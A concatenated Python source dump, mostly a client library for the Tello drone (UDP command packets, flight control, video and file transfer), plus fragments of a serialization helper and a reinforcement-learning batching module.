if hasattr(obj, "_to_dict"):
return obj._to_dict(exclude=exclude)
if isinstance(obj, (list, tuple, set, frozenset, deque, KeysView, ValuesView)):
return [recursive_to_dict(el, exclude=exclude) for el in obj]
if isinstance(obj, dict):
res = {}
for k, v in obj.items():
k = recursive_to_dict(k, exclude=exclude)
v = recursive_to_dict(v, exclude=exclude)
try:
res[k] = v
except TypeError:
res[str(k)] = v
return res
return repr(obj)
finally:
tok.var.reset(tok)
|
tello.py
|
import threading
import socket
import time
import datetime
import struct
import sys
import os
from . import crc
from . import logger
from . import event
from . import state
from . import error
from . import video_stream
from . utils import *
from . protocol import *
from . import dispatcher
log = logger.Logger('Tello')
class Tello(object):
EVENT_CONNECTED = event.Event('connected')
EVENT_WIFI = event.Event('wifi')
EVENT_LIGHT = event.Event('light')
EVENT_FLIGHT_DATA = event.Event('fligt_data')
EVENT_LOG_HEADER = event.Event('log_header')
EVENT_LOG = EVENT_LOG_HEADER
EVENT_LOG_RAWDATA = event.Event('log_rawdata')
EVENT_LOG_DATA = event.Event('log_data')
EVENT_LOG_CONFIG = event.Event('log_config')
EVENT_TIME = event.Event('time')
EVENT_VIDEO_FRAME = event.Event('video frame')
EVENT_VIDEO_DATA = event.Event('video data')
EVENT_DISCONNECTED = event.Event('disconnected')
EVENT_FILE_RECEIVED = event.Event('file received')
# internal events
__EVENT_CONN_REQ = event.Event('conn_req')
__EVENT_CONN_ACK = event.Event('conn_ack')
__EVENT_TIMEOUT = event.Event('timeout')
__EVENT_QUIT_REQ = event.Event('quit_req')
    # for backward compatibility
CONNECTED_EVENT = EVENT_CONNECTED
WIFI_EVENT = EVENT_WIFI
LIGHT_EVENT = EVENT_LIGHT
FLIGHT_EVENT = EVENT_FLIGHT_DATA
LOG_EVENT = EVENT_LOG
TIME_EVENT = EVENT_TIME
VIDEO_FRAME_EVENT = EVENT_VIDEO_FRAME
STATE_DISCONNECTED = state.State('disconnected')
STATE_CONNECTING = state.State('connecting')
STATE_CONNECTED = state.State('connected')
STATE_QUIT = state.State('quit')
LOG_ERROR = logger.LOG_ERROR
LOG_WARN = logger.LOG_WARN
LOG_INFO = logger.LOG_INFO
LOG_DEBUG = logger.LOG_DEBUG
LOG_ALL = logger.LOG_ALL
def __init__(self, net_int="wlan0", port=9000, tello_ip='192.168.10.1', cmd_port=8889, vid_port=6038):
self.tello_addr = (tello_ip, cmd_port)
self.tello_vid_port = vid_port
self.net_int = net_int # net interface
self.debug = False
self.pkt_seq_num = 0x01e4
self.port = port
self.udpsize = 2000
self.left_x = 0.0
self.left_y = 0.0
self.right_x = 0.0
self.right_y = 0.0
self.sock = None
self.state = self.STATE_DISCONNECTED
self.lock = threading.Lock()
self.connected = threading.Event()
self.video_enabled = False
self.prev_video_data_time = None
self.video_data_size = 0
self.video_data_loss = 0
self.log = log
self.exposure = 0
self.video_encoder_rate = 4
self.video_stream = None
self.wifi_strength = 0
self.log_data = LogData(log)
self.log_data_file = None
self.log_data_header_recorded = False
# video zoom state
self.zoom = False
# fast mode state
self.fast_mode = False
        # File receive state.
self.file_recv = {} # Map filenum -> protocol.DownloadedFile
# Create a UDP socket
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.sock.setsockopt(socket.SOL_SOCKET, 25, self.net_int.encode())  # 25 == SO_BINDTODEVICE (Linux): bind to the chosen network interface
self.sock.bind(('', self.port))
self.sock.settimeout(2.0)
dispatcher.connect(self.__state_machine, dispatcher.signal.All)
threading.Thread(target=self.__recv_thread).start()
threading.Thread(target=self.__video_thread).start()
def set_loglevel(self, level):
"""
Set_loglevel controls the output messages. Valid levels are
LOG_ERROR, LOG_WARN, LOG_INFO, LOG_DEBUG and LOG_ALL.
"""
log.set_level(level)
def get_video_stream(self):
"""
        Get_video_stream is used to prepare a buffer object which receives video data from the drone.
"""
newly_created = False
self.lock.acquire()
log.info('get video stream')
try:
if self.video_stream is None:
self.video_stream = video_stream.VideoStream(self)
newly_created = True
res = self.video_stream
finally:
self.lock.release()
if newly_created:
self.__send_exposure()
self.__send_video_encoder_rate()
self.start_video()
return res
def connect(self):
"""Connect is used to send the initial connection request to the drone."""
self.__publish(event=self.__EVENT_CONN_REQ)
def wait_for_connection(self, timeout=None):
"""Wait_for_connection will block until the connection is established."""
if not self.connected.wait(timeout):
raise error.TelloError('timeout')
def __send_conn_req(self):
port = 9617
port0 = (int(port/1000) % 10) << 4 | (int(port/100) % 10)
port1 = (int(port/10) % 10) << 4 | (int(port/1) % 10)
buf = 'conn_req:%c%c' % (chr(port0), chr(port1))
log.info('send connection request (cmd="%s%02x%02x")' % (str(buf[:-2]), port0, port1))
return self.send_packet(Packet(buf))
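    # Worked example of the encoding above: the port number 9617 is packed two decimal
    # digits per byte (BCD-style), so port0 = 9 << 4 | 6 = 0x96 and
    # port1 = 1 << 4 | 7 = 0x17, and the connection request ends with the bytes
    # 0x96 0x17 after the 'conn_req:' prefix.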
def subscribe(self, signal, handler):
"""Subscribe a event such as EVENT_CONNECTED, EVENT_FLIGHT_DATA, EVENT_VIDEO_FRAME and so on."""
dispatcher.connect(handler, signal)
def __publish(self, event, data=None, **args):
args.update({'data': data})
if 'signal' in args:
del args['signal']
if 'sender' in args:
del args['sender']
log.debug('publish signal=%s, args=%s' % (event, args))
dispatcher.send(event, sender=self, **args)
def takeoff(self):
"""Takeoff tells the drones to liftoff and start flying."""
log.info('set altitude limit 30m')
pkt = Packet(SET_ALT_LIMIT_CMD)
pkt.add_byte(0x1e) # 30m
pkt.add_byte(0x00)
self.send_packet(pkt)
log.info('takeoff (cmd=0x%02x seq=0x%04x)' % (TAKEOFF_CMD, self.pkt_seq_num))
pkt = Packet(TAKEOFF_CMD)
pkt.fixup()
return self.send_packet(pkt)
def throw_and_go(self):
"""Throw_and_go starts a throw and go sequence"""
log.info('throw_and_go (cmd=0x%02x seq=0x%04x)' % (THROW_AND_GO_CMD, self.pkt_seq_num))
pkt = Packet(THROW_AND_GO_CMD, 0x48)
pkt.add_byte(0x00)
pkt.fixup()
return self.send_packet(pkt)
def land(self):
"""Land tells the drone to come in for landing."""
log.info('land (cmd=0x%02x seq=0x%04x)' % (LAND_CMD, self.pkt_seq_num))
pkt = Packet(LAND_CMD)
pkt.add_byte(0x00)
pkt.fixup()
return self.send_packet(pkt)
def palm_land(self):
"""Tells the drone to wait for a hand underneath it and then land."""
log.info('palmland (cmd=0x%02x seq=0x%04x)' % (PALM_LAND_CMD, self.pkt_seq_num))
pkt = Packet(PALM_LAND_CMD)
pkt.add_byte(0x00)
pkt.fixup()
return self.send_packet(pkt)
def quit(self):
"""Quit stops the internal threads."""
log.info('quit')
self.__publish(event=self.__EVENT_QUIT_REQ)
def get_alt_limit(self):
''' ... '''
self.log.debug('get altitude limit (cmd=0x%02x seq=0x%04x)' % (
ALT_LIMIT_MSG, self.pkt_seq_num))
pkt = Packet(ALT_LIMIT_MSG)
pkt.fixup()
return self.send_packet(pkt)
def set_alt_limit(self, limit):
self.log.info('set altitude limit=%s (cmd=0x%02x seq=0x%04x)' % (
int(limit), SET_ALT_LIMIT_CMD, self.pkt_seq_num))
pkt = Packet(SET_ALT_LIMIT_CMD)
pkt.add_byte(int(limit))
pkt.add_byte(0x00)
pkt.fixup()
self.send_packet(pkt)
self.get_alt_limit()
def get_att_limit(self):
''' ... '''
self.log.debug('get attitude limit (cmd=0x%02x seq=0x%04x)' % (
ATT_LIMIT_MSG, self.pkt_seq_num))
pkt = Packet(ATT_LIMIT_MSG)
pkt.fixup()
return self.send_packet(pkt)
def set_att_limit(self, limit):
self.log.info('set attitude limit=%s (cmd=0x%02x seq=0x%04x)' % (
int(limit), ATT_LIMIT_CMD, self.pkt_seq_num))
pkt = Packet(ATT_LIMIT_CMD)
pkt.add_byte(0x00)
pkt.add_byte(0x00)
pkt.add_byte( int(float_to_hex(float(limit))[4:6], 16) ) # 'attitude limit' formatted in float of 4 bytes
pkt.add_byte(0x41)
pkt.fixup()
self.send_packet(pkt)
self.get_att_limit()
def get_low_bat_threshold(self):
''' ... '''
self.log.debug('get low battery threshold (cmd=0x%02x seq=0x%04x)' % (
LOW_BAT_THRESHOLD_MSG, self.pkt_seq_num))
pkt = Packet(LOW_BAT_THRESHOLD_MSG)
pkt.fixup()
return self.send_packet(pkt)
def set_low_bat_threshold(self, threshold):
self.log.info('set low battery threshold=%s (cmd=0x%02x seq=0x%04x)' % (
int(threshold), LOW_BAT_THRESHOLD_CMD, self.pkt_seq_num))
pkt = Packet(LOW_BAT_THRESHOLD_CMD)
pkt.add_byte(int(threshold))
pkt.fixup()
self.send_packet(pkt)
self.get_low_bat_threshold()
def __send_time_command(self):
log.info('send_time (cmd=0x%02x seq=0x%04x)' % (TIME_CMD, self.pkt_seq_num))
pkt = Packet(TIME_CMD, 0x50)
pkt.add_byte(0)
pkt.add_time()
pkt.fixup()
return self.send_packet(pkt)
def __send_start_video(self):
pkt = Packet(VIDEO_START_CMD, 0x60)
pkt.fixup()
return self.send_packet(pkt)
def __send_video_mode(self, mode):
pkt = Packet(VIDEO_MODE_CMD)
pkt.add_byte(mode)
pkt.fixup()
return self.send_packet(pkt)
def set_video_mode(self, zoom=False):
"""Tell the drone whether to capture 960x720 4:3 video, or 1280x720 16:9 zoomed video.
4:3 has a wider field of view (both vertically and horizontally), 16:9 is crisper."""
log.info('set video mode zoom=%s (cmd=0x%02x seq=0x%04x)' % (
zoom, VIDEO_START_CMD, self.pkt_seq_num))
self.zoom = zoom
return self.__send_video_mode(int(zoom))
def start_video(self):
"""Start_video tells the drone to send start info (SPS/PPS) for video stream."""
log.info('start video (cmd=0x%02x seq=0x%04x)' % (VIDEO_START_CMD, self.pkt_seq_num))
self.video_enabled = True
self.__send_exposure()
self.__send_video_encoder_rate()
return self.__send_start_video()
def set_exposure(self, level):
"""Set_exposure sets the drone camera exposure level. Valid levels are 0, 1, and 2."""
if level < 0 or 2 < level:
raise error.TelloError('Invalid exposure level')
log.info('set exposure (cmd=0x%02x seq=0x%04x)' % (EXPOSURE_CMD, self.pkt_seq_num))
self.exposure = level
return self.__send_exposure()
def __send_exposure(self):
pkt = Packet(EXPOSURE_CMD, 0x48)
pkt.add_byte(self.exposure)
pkt.fixup()
return self.send_packet(pkt)
def set_video_encoder_rate(self, rate):
"""Set_video_encoder_rate sets the drone video encoder rate."""
log.info('set video encoder rate (cmd=0x%02x seq=%04x)' %
(VIDEO_ENCODER_RATE_CMD, self.pkt_seq_num))
self.video_encoder_rate = rate
return self.__send_video_encoder_rate()
def __send_video_encoder_rate(self):
pkt = Packet(VIDEO_ENCODER_RATE_CMD, 0x68)
pkt.add_byte(self.video_encoder_rate)
pkt.fixup()
return self.send_packet(pkt)
def take_picture(self):
log.info('take picture')
return self.send_packet_data(TAKE_PICTURE_COMMAND, type=0x68)
def up(self, val):
"""Up tells the drone to ascend. Pass in an int from 0-100."""
log.info('up(val=%d)' % val)
self.left_y = val / 100.0
def down(self, val):
"""Down tells the drone to descend. Pass in an int from 0-100."""
log.info('down(val=%d)' % val)
self.left_y = val / 100.0 * -1
def forward(self, val):
"""Forward tells the drone to go forward. Pass in an int from 0-100."""
log.info('forward(val=%d)' % val)
self.right_y = val / 100.0
def backward(self, val):
"""Backward tells the drone to go in reverse. Pass in an int from 0-100."""
log.info('backward(val=%d)' % val)
self.right_y = val / 100.0 * -1
def right(self, val):
"""Right tells the drone to go right. Pass in an int from 0-100."""
log.info('right(val=%d)' % val)
self.right_x = val / 100.0
def left(self, val):
"""Left tells the drone to go left. Pass in an int from 0-100."""
log.info('left(val=%d)' % val)
self.right_x = val / 100.0 * -1
def clockwise(self, val):
"""
Clockwise tells the drone to rotate in a clockwise direction.
Pass in an int from 0-100.
"""
log.info('clockwise(val=%d)' % val)
self.left_x = val / 100.0
def counter_clockwise(self, val):
"""
CounterClockwise tells the drone to rotate in a counter-clockwise direction.
Pass in an int from 0-100.
"""
log.info('counter_clockwise(val=%d)' % val)
self.left_x = val / 100.0 * -1
def flip_forward(self):
"""flip_forward tells the drone to perform a forwards flip"""
log.info('flip_forward (cmd=0x%02x seq=0x%04x)' % (FLIP_CMD, self.pkt_seq_num))
pkt = Packet(FLIP_CMD, 0x70)
pkt.add_byte(FlipFront)
pkt.fixup()
return self.send_packet(pkt)
def flip_back(self):
"""flip_back tells the drone to perform a backwards flip"""
log.info('flip_back (cmd=0x%02x seq=0x%04x)' % (FLIP_CMD, self.pkt_seq_num))
pkt = Packet(FLIP_CMD, 0x70)
pkt.add_byte(FlipBack)
pkt.fixup()
return self.send_packet(pkt)
def flip_right(self):
"""flip_right tells the drone to perform a right flip"""
log.info('flip_right (cmd=0x%02x seq=0x%04x)' % (FLIP_CMD, self.pkt_seq_num))
pkt = Packet(FLIP_CMD, 0x70)
pkt.add_byte(FlipRight)
pkt.fixup()
return self.send_packet(pkt)
def flip_left(self):
"""flip_left tells the drone to perform a left flip"""
log.info('flip_left (cmd=0x%02x seq=0x%04x)' % (FLIP_CMD, self.pkt_seq_num))
pkt = Packet(FLIP_CMD, 0x70)
pkt.add_byte(FlipLeft)
pkt.fixup()
return self.send_packet(pkt)
def flip_forwardleft(self):
"""flip_forwardleft tells the drone to perform a forwards left flip"""
log.info('flip_forwardleft (cmd=0x%02x seq=0x%04x)' % (FLIP_CMD, self.pkt_seq_num))
pkt = Packet(FLIP_CMD, 0x70)
pkt.add_byte(FlipForwardLeft)
pkt.fixup()
return self.send_packet(pkt)
def flip_backleft(self):
"""flip_backleft tells the drone to perform a backwards left flip"""
log.info('flip_backleft (cmd=0x%02x seq=0x%04x)' % (FLIP_CMD, self.pkt_seq_num))
pkt = Packet(FLIP_CMD, 0x70)
pkt.add_byte(FlipBackLeft)
pkt.fixup()
return self.send_packet(pkt)
def flip_forwardright(self):
"""flip_forwardright tells the drone to perform a forwards right flip"""
log.info('flip_forwardright (cmd=0x%02x seq=0x%04x)' % (FLIP_CMD, self.pkt_seq_num))
pkt = Packet(FLIP_CMD, 0x70)
pkt.add_byte(FlipForwardRight)
pkt.fixup()
return self.send_packet(pkt)
def flip_backright(self):
"""flip_backleft tells the drone to perform a backwards right flip"""
log.info('flip_backright (cmd=0x%02x seq=0x%04x)' % (FLIP_CMD, self.pkt_seq_num))
pkt = Packet(FLIP_CMD, 0x70)
pkt.add_byte(FlipBackRight)
pkt.fixup()
return self.send_packet(pkt)
def __fix_range(self, val, min=-1.0, max=1.0):
if val < min:
val = min
elif val > max:
val = max
return val
def set_throttle(self, throttle):
"""
Set_throttle controls the vertical up and down motion of the drone.
        Pass in a float from -1.0 to 1.0. (positive values move the drone upward)
"""
if self.left_y != self.__fix_range(throttle):
log.info('set_throttle(val=%4.2f)' % throttle)
self.left_y = self.__fix_range(throttle)
def set_yaw(self, yaw):
"""
Set_yaw controls the left and right rotation of the drone.
        Pass in a float from -1.0 to 1.0. (positive values turn the drone to the right)
"""
if self.left_x != self.__fix_range(yaw):
log.info('set_yaw(val=%4.2f)' % yaw)
self.left_x = self.__fix_range(yaw)
def set_pitch(self, pitch):
"""
Set_pitch controls the forward and backward tilt of the drone.
        Pass in a float from -1.0 to 1.0. (positive values move the drone forward)
"""
if self.right_y != self.__fix_range(pitch):
log.info('set_pitch(val=%4.2f)' % pitch)
self.right_y = self.__fix_range(pitch)
def set_roll(self, roll):
"""
        Set_roll controls the side-to-side tilt of the drone.
        Pass in a float from -1.0 to 1.0. (positive values move the drone to the right)
"""
if self.right_x != self.__fix_range(roll):
log.info('set_roll(val=%4.2f)' % roll)
self.right_x = self.__fix_range(roll)
    def toggle_fast_mode(self):
        self.fast_mode = not self.fast_mode
def manual_takeoff(self):
# Hold max 'yaw' and min 'pitch', 'roll', 'throttle' for several seconds
self.set_pitch(-1)
self.set_roll(-1)
self.set_yaw(1)
self.set_throttle(-1)
self.fast_mode = False
def __send_stick_command(self):
pkt = Packet(STICK_CMD, 0x60)
axis1 = int(1024 + 660.0 * self.right_x) & 0x7ff
axis2 = int(1024 + 660.0 * self.right_y) & 0x7ff
axis3 = int(1024 + 660.0 * self.left_y) & 0x7ff
axis4 = int(1024 + 660.0 * self.left_x) & 0x7ff
axis5 = int(self.fast_mode) & 0x01
'''
11 bits (-1024 ~ +1023) x 4 axis = 44 bits
fast_mode takes 1 bit
44 bits will be packed in to 6 bytes (48 bits)
axis4 axis3 axis2 axis1
| | | | |
4 3 2 1 0
98765432109876543210987654321098765432109876543210
| | | | | | |
byte5 byte4 byte3 byte2 byte1 byte0
'''
log.debug("stick command: fast=%d yaw=%4d thr=%4d pit=%4d rol=%4d" %
(axis5, axis4, axis3, axis2, axis1))
log.debug("stick command: fast=%04x yaw=%04x thr=%04x pit=%04x rol=%04x" %
(axis5, axis4, axis3, axis2, axis1))
packed = axis1 | (axis2 << 11) | (
axis3 << 22) | (axis4 << 33) | (axis5 << 44)
packed_bytes = struct.pack('<Q', packed)
pkt.add_byte(byte(packed_bytes[0]))
pkt.add_byte(byte(packed_bytes[1]))
pkt.add_byte(byte(packed_bytes[2]))
pkt.add_byte(byte(packed_bytes[3]))
pkt.add_byte(byte(packed_bytes[4]))
pkt.add_byte(byte(packed_bytes[5]))
pkt.add_time()
pkt.fixup()
log.debug("stick command: %s" % byte_to_hexstring(pkt.get_buffer()))
return self.send_packet(pkt)
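    # Worked example of the stick packing above: with all sticks centered
    # (left_x = left_y = right_x = right_y = 0.0) every axis becomes
    # int(1024 + 660.0 * 0.0) & 0x7ff = 0x400, and fast_mode off gives axis5 = 0, so
    # packed = 0x400 | 0x400 << 11 | 0x400 << 22 | 0x400 << 33 = 0x080100200400 and
    # the six payload bytes are 00 04 20 00 01 08 (little-endian).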
def __send_ack_log(self, id):
pkt = Packet(LOG_HEADER_MSG, 0x50)
pkt.add_byte(0x00)
b0, b1 = le16(id)
pkt.add_byte(b0)
pkt.add_byte(b1)
pkt.fixup()
return self.send_packet(pkt)
def send_packet(self, pkt):
"""Send_packet is used to send a command packet to the drone."""
try:
cmd = pkt.get_buffer()
self.sock.sendto(cmd, self.tello_addr)
log.debug("send_packet: %s" % byte_to_hexstring(cmd))
except socket.error as err:
if self.state == self.STATE_CONNECTED:
log.error("send_packet: %s" % str(err))
else:
log.info("send_packet: %s" % str(err))
return False
return True
def send_packet_data(self, command, type=0x68, payload=[]):
pkt = Packet(command, type, payload)
pkt.fixup()
return self.send_packet(pkt)
def __process_packet(self, data):
        if isinstance(data, str):
            # Python 2 compatibility: convert a str payload to a bytearray of ints.
            data = bytearray(ord(x) for x in data)
if str(data[0:9]) == 'conn_ack:' or data[0:9] == b'conn_ack:':
log.info('connected. (port=%2x%2x)' % (data[9], data[10]))
log.debug(' %s' % byte_to_hexstring(data))
if self.video_enabled:
self.__send_exposure()
self.__send_video_encoder_rate()
self.__send_start_video()
self.__publish(self.__EVENT_CONN_ACK, data)
return True
if data[0] != START_OF_PACKET:
log.info('start of packet != %02x (%02x) (ignored)' % (START_OF_PACKET, data[0]))
log.info(' %s' % byte_to_hexstring(data))
log.info(' %s' % str(map(chr, data))[1:-1])
return False
pkt = Packet(data)
cmd = uint16(data[5], data[6])
if cmd == LOG_HEADER_MSG:
id = uint16(data[9], data[10])
log.info("recv: log_header: id=%04x, '%s'" % (id, str(data[28:54])))
log.debug("recv: log_header: %s" % byte_to_hexstring(data[9:]))
self.__send_ack_log(id)
self.__publish(event=self.EVENT_LOG_HEADER, data=data[9:])
if self.log_data_file and not self.log_data_header_recorded:
self.log_data_file.write(data[12:-2])
self.log_data_header_recorded = True
elif cmd == LOG_DATA_MSG:
log.debug("recv: log_data: length=%d, %s" % (len(data[9:]), byte_to_hexstring(data[9:])))
self.__publish(event=self.EVENT_LOG_RAWDATA, data=data[9:])
try:
self.log_data.update(data[10:])
if self.log_data_file:
self.log_data_file.write(data[10:-2])
except Exception as ex:
log.error('%s' % str(ex))
self.__publish(event=self.EVENT_LOG_DATA, data=self.log_data)
elif cmd == LOG_CONFIG_MSG:
log.debug("recv: log_config: length=%d, %s" % (len(data[9:]), byte_to_hexstring(data[9:])))
self.__publish(event=self.EVENT_LOG_CONFIG, data=data[9:])
elif cmd == WIFI_MSG:
log.debug("recv: wifi: %s" % byte_to_hexstring(data[9:]))
self.wifi_strength = data[9]
self.__publish(event=self.EVENT_WIFI, data=data[9:])
elif cmd == ALT_LIMIT_MSG:
log.info("recv: altitude limit: %s" % byte_to_hexstring(data[9:-2]))
elif cmd == ATT_LIMIT_MSG:
log.info("recv: attitude limit: %s" % byte_to_hexstring(data[9:-2]))
elif cmd == LOW_BAT_THRESHOLD_MSG:
log.info("recv: low battery threshold: %s" % byte_to_hexstring(data[9:-2]))
elif cmd == LIGHT_MSG:
log.debug("recv: light: %s" % byte_to_hexstring(data[9:-2]))
self.__publish(event=self.EVENT_LIGHT, data=data[9:])
elif cmd == FLIGHT_MSG:
flight_data = FlightData(data[9:])
flight_data.wifi_strength = self.wifi_strength
log.debug("recv: flight data: %s" % str(flight_data))
self.__publish(event=self.EVENT_FLIGHT_DATA, data=flight_data)
elif cmd == TIME_CMD:
log.debug("recv: time data: %s" % byte_to_hexstring(data))
self.__publish(event=self.EVENT_TIME, data=data[7:9])
elif cmd in (SET_ALT_LIMIT_CMD, ATT_LIMIT_CMD, LOW_BAT_THRESHOLD_CMD, TAKEOFF_CMD, LAND_CMD, VIDEO_START_CMD, VIDEO_ENCODER_RATE_CMD, PALM_LAND_CMD,
EXPOSURE_CMD, THROW_AND_GO_CMD, EMERGENCY_CMD):
log.debug("recv: ack: cmd=0x%02x seq=0x%04x %s" %
(uint16(data[5], data[6]), uint16(data[7], data[8]), byte_to_hexstring(data)))
elif cmd == TELLO_CMD_FILE_SIZE:
# Drone is about to send us a file. Get ready.
# N.b. one of the fields in the packet is a file ID; by demuxing
# based on file ID we can receive multiple files at once. This
# code doesn't support that yet, though, so don't take one photo
# while another is still being received.
log.info("recv: file size: %s" % byte_to_hexstring(data))
if len(pkt.get_data()) >= 7:
(size, filenum) = struct.unpack('<xLH', pkt.get_data())
log.info(' file size: num=%d bytes=%d' % (filenum, size))
# Initialize file download state.
self.file_recv[filenum] = DownloadedFile(filenum, size)
else:
# We always seem to get two files, one with most of the payload missing.
# Not sure what the second one is for.
log.warn(' file size: payload too small: %s' % byte_to_hexstring(pkt.get_data()))
# Ack the packet.
self.send_packet(pkt)
elif cmd == TELLO_CMD_FILE_DATA:
# log.info("recv: file data: %s" % byte_to_hexstring(data[9:21]))
# Drone is sending us a fragment of a file it told us to prepare
# for earlier.
self.recv_file_data(pkt.get_data())
else:
log.info('unknown packet: %04x %s' % (cmd, byte_to_hexstring(data)))
return False
return True
def recv_file_data(self, data):
(filenum,chunk,fragment,size) = struct.unpack('<HLLH', data[0:12])
file = self.file_recv.get(filenum, None)
# Preconditions.
if file is None:
return
if file.recvFragment(chunk, fragment, size, data[12:12+size]):
# Did this complete a chunk? Ack the chunk so the drone won't
# re-send it.
self.send_packet_data(TELLO_CMD_FILE_DATA, type=0x50,
payload=struct.pack('<BHL', 0, filenum, chunk))
if file.done():
# We have the whole file! First, send a normal ack with the first
# byte set to 1 to indicate file completion.
self.send_packet_data(TELLO_CMD_FILE_DATA, type=0x50,
payload=struct.pack('<BHL', 1, filenum, chunk))
# Then send the FILE_COMPLETE packed separately telling it how
# large we thought the file was.
self.send_packet_data(TELLO_CMD_FILE_COMPLETE, type=0x48,
payload=struct.pack('<HL', filenum, file.size))
# Inform subscribers that we have a file and clean up.
self.__publish(event=self.EVENT_FILE_RECEIVED, data=file.data())
del self.file_recv[filenum]
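    # Summary of the file-transfer handshake implemented above: the drone announces a
    # transfer with TELLO_CMD_FILE_SIZE, each completed chunk is acknowledged with a
    # TELLO_CMD_FILE_DATA packet whose first payload byte is 0, the final chunk is
    # acknowledged with that byte set to 1, and TELLO_CMD_FILE_COMPLETE then reports
    # the received file size back to the drone.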
    def record_log_data(self, path=None):
        if path is None:
path = '%s/Documents/tello-%s.dat' % (
os.getenv('HOME'),
datetime.datetime.now().strftime('%Y-%m-%d_%H%M%S'))
log.info('record log data in %s' % path)
self.log_data_file = open(path, 'wb')
def __state_machine(self, event, sender, data, **args):
self.lock.acquire()
cur_state = self.state
event_connected = False
event_disconnected = False
log.debug('event %s in state %s' % (str(event), str(self.state)))
if self.state == self.STATE_DISCONNECTED:
if event == self.__EVENT_CONN_REQ:
self.__send_conn_req()
self.state = self.STATE_CONNECTING
elif event == self.__EVENT_QUIT_REQ:
self.state = self.STATE_QUIT
event_disconnected = True
self.video_enabled = False
elif self.state == self.STATE_CONNECTING:
if event == self.__EVENT_CONN_ACK:
self.state = self.STATE_CONNECTED
event_connected = True
# send time
self.__send_time_command()
elif event == self.__EVENT_TIMEOUT:
self.__send_conn_req()
elif event == self.__EVENT_QUIT_REQ:
self.state = self.STATE_QUIT
elif self.state == self.STATE_CONNECTED:
if event == self.__EVENT_TIMEOUT:
self.__send_conn_req()
self.state = self.STATE_CONNECTING
event_disconnected = True
self.video_enabled = False
elif event == self.__EVENT_QUIT_REQ:
self.state = self.STATE_QUIT
event_disconnected = True
self.video_enabled = False
elif self.state == self.STATE_QUIT:
pass
if cur_state != self.state:
log.info('state transit %s -> %s' % (cur_state, self.state))
self.lock.release()
if event_connected:
self.__publish(event=self.EVENT_CONNECTED, **args)
self.connected.set()
if event_disconnected:
self.__publish(event=self.EVENT_DISCONNECTED, **args)
self.connected.clear()
def __recv_thread(self):
sock = self.sock
while self.state != self.STATE_QUIT:
if self.state == self.STATE_CONNECTED:
self.__send_stick_command() # ignore errors
try:
data, server = sock.recvfrom(self.udpsize)
log.debug("recv: %s" % byte_to_hexstring(data))
self.__process_packet(data)
except socket.timeout as ex:
if self.state == self.STATE_CONNECTED:
log.error('recv: timeout')
self.__publish(event=self.__EVENT_TIMEOUT)
except Exception as ex:
log.error('recv: %s' % str(ex))
show_exception(ex)
log.info('exit from the recv thread.')
def __video_thread(self):
log.info('start video thread')
# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 512 * 1024) # original line
        sock.setsockopt(socket.SOL_SOCKET, 25, self.net_int.encode())  # 25 == SO_BINDTODEVICE (Linux): bind to the chosen network interface
port = self.tello_vid_port
sock.bind(('', port))
sock.settimeout(1.0)
log.info('video receive buffer size = %d' %
sock.getsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF))
prev_video_data = None
prev_ts = None
history = []
while self.state != self.STATE_QUIT:
if not self.video_enabled:
time.sleep(1.0)
continue
try:
data, server = sock.recvfrom(self.udpsize)
now = datetime.datetime.now()
log.debug("video recv: %s %d bytes" % (byte_to_hexstring(data[0:2]), len(data)))
show_history = False
# check video data loss
video_data = VideoData(data)
loss = video_data.gap(prev_video_data)
if loss != 0:
self.video_data_loss += loss
# enable this line to see packet history
# show_history = True
prev_video_data = video_data
# check video data interval
if prev_ts is not None and 0.1 < (now - prev_ts).total_seconds():
log.info('video recv: %d bytes %02x%02x +%03d' %
(len(data), byte(data[0]), byte(data[1]),
(now - prev_ts).total_seconds() * 1000))
prev_ts = now
# save video data history
history.append([now, len(data), byte(data[0])*256 + byte(data[1])])
if 100 < len(history):
history = history[1:]
# show video data history
if show_history:
prev_ts = history[0][0]
for i in range(1, len(history)):
[ ts, sz, sn ] = history[i]
print(' %02d:%02d:%02d.%03d %4d bytes %04x +%03d%s' %
(ts.hour, ts.minute, ts.second, ts.microsecond/1000,
sz, sn, (ts - prev_ts).total_seconds()*1000,
(' *' if i == len(history) - 1 else '')))
prev_ts = ts
history = history[-1:]
# deliver video frame to subscribers
self.__publish(event=self.EVENT_VIDEO_FRAME, data=data[2:])
self.__publish(event=self.EVENT_VIDEO_DATA, data=data)
# show video frame statistics
if self.prev_video_data_time is None:
self.prev_video_data_time = now
self.video_data_size += len(data)
dur = (now - self.prev_video_data_time).total_seconds()
if 2.0 < dur:
log.info(('video data %d bytes %5.1fKB/sec' %
(self.video_data_size, self.video_data_size / dur / 1024)) +
((' loss=%d' % self.video_data_loss) if self.video_data_loss != 0 else ''))
self.video_data_size = 0
self.prev_video_data_time = now
self.video_data_loss = 0
# keep sending start video command
self.__send_start_video()
except socket.timeout as ex:
log.error('video recv: timeout')
self.start_video()
data = None
except Exception as ex:
log.error('video recv: %s' % str(ex))
show_exception(ex)
log.info('exit from the video thread.')
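# Note on the video packets handled above: each UDP datagram begins with a
# 2-byte sequence counter (byte(data[0]) * 256 + byte(data[1])); losses are
# detected from gaps in that counter via VideoData.gap(). The full datagram
# is published as EVENT_VIDEO_DATA and the payload after the 2-byte header
# as EVENT_VIDEO_FRAME.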
if __name__ == '__main__':
print('You can use test.py for testing.')
|
batching.py
|
"""Functions to generate batches for the reinforcement learning part.
Mainly intended for training, though during the playing phase, the same
functions are used."""
from __future__ import print_function, division
import sys
import os
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
import models as models_reinforced
import cv2
from config import Config
import imgaug as ia
from lib.util import to_variable, to_cuda, to_numpy
from lib import util
from lib import actions as actionslib
from lib import replay_memory
import numpy as np
from scipy import misc
import multiprocessing
import threading
import random
import time
if sys.version_info[0] == 2:
import cPickle as pickle
from Queue import Full as QueueFull
elif sys.version_info[0] == 3:
import pickle
from queue import Full as QueueFull
xrange = range
GPU = Config.GPU
NB_REWARD_BINS = 101
class BatchData(object):
"""Method encapsulating the data of a single batch.
TODO some of the functions are named like properties, rename
"""
def __init__(self, curr_idx, images_by_timestep, images_prev_by_timestep, multiactions, rewards, speeds, is_reverse, steering_wheel, steering_wheel_raw, previous_states_distances):
self.curr_idx = curr_idx
self.images_by_timestep = images_by_timestep
self.images_prev_by_timestep = images_prev_by_timestep
self.multiactions = multiactions
self.rewards = rewards
self.speeds = speeds
